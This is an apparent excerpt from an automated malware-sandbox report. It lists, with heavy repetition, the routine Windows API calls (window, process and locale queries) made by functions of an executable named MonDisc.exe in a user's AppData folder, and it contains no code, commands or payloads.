Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F832A AnyPopup,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F832A
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F825C GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F825C
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F825C GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F825C
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F82A9 GetParent,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F82A9
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F82A9 GetParent,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F82A9
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F834D IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F834D
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F834D IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F834D
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F8EB4 GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,GetForegroundWindow,GetDoubleClickTime,GetUserDefaultLangID,GetLargePageMinimum,GetModuleHandleW,IsZoomed,GetWindowTextLengthW,GetDesktopWindow,GetTopWindow,GetCommandLineW,GetTopWindow,GetMessageTime,GetSystemDefaultLangID,AnyPopup,GetCurrentProcessId,GetUserDefaultLangID,GetSystemDefaultLangID,GetTopWindow,GetSystemDefaultLangID,GetMessageTime,GetMessageExtraInfo,IsZoomed,GetForegroundWindow,GetDoubleClickTime,GetUserDefaultLangID,GetLargePageMinimum,GetShellWindow,GetCurrentProcessId,GetCommandLineW,GetModuleHandleW,GetCommandLineW,GetCommandLineW,GetCurrentProcessId,GetLargePageMinimum,GetMessageExtraInfo,GetWindowTextLengthW,22_2_00007FF62C8F8EB4
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,22_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,22_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,22_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,22_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,22_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F56BC GetModuleHandleW,GetMessageExtraInfo,AnyPopup,GetWindowTextLengthW,IsZoomed,AnyPopup,GetShellWindow,GetTickCount,GetLastActivePopup,GetTickCount,GetCommandLineW,GetForegroundWindow,GetTopWindow,GetCommandLineW,GetTopWindow,GetForegroundWindow,GetMessageExtraInfo,IsZoomed,GetShellWindow,GetMessageExtraInfo,GetCurrentProcess,GetModuleHandleW,GetTickCount,AnyPopup,IsIconic,GetWindowTextLengthW,GetTopWindow,GetCurrentProcessId,GetTopWindow,GetShellWindow,GetCommandLineW,22_2_00007FF62C8F56BC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F81BD GetCurrentProcess,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,GetLastActivePopup,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F81BD
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F63BA GetDesktopWindow,GetDoubleClickTime,GetSystemDefaultLangID,GetDoubleClickTime,GetDoubleClickTime,GetDoubleClickTime,GetDesktopWindow,GetWindowTextLengthW,GetDoubleClickTime,GetWindowTextLengthW,GetCommandLineW,GetForegroundWindow,GetTopWindow,GetLargePageMinimum,GetForegroundWindow,GetForegroundWindow,GetTickCount,GetWindowTextLengthW,IsIconic,GetCommandLineW,GetDoubleClickTime,GetUserDefaultLangID,GetDesktopWindow,GetParent,22_2_00007FF62C8F63BA
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F8F3E GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,GetForegroundWindow,GetDoubleClickTime,GetCurrentProcessId,GetUserDefaultLangID,GetModuleHandleW,IsZoomed,22_2_00007FF62C8F8F3E
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F8202 GetCurrentProcess,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F8202
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F8202 GetCurrentProcess,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F8202
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F516F
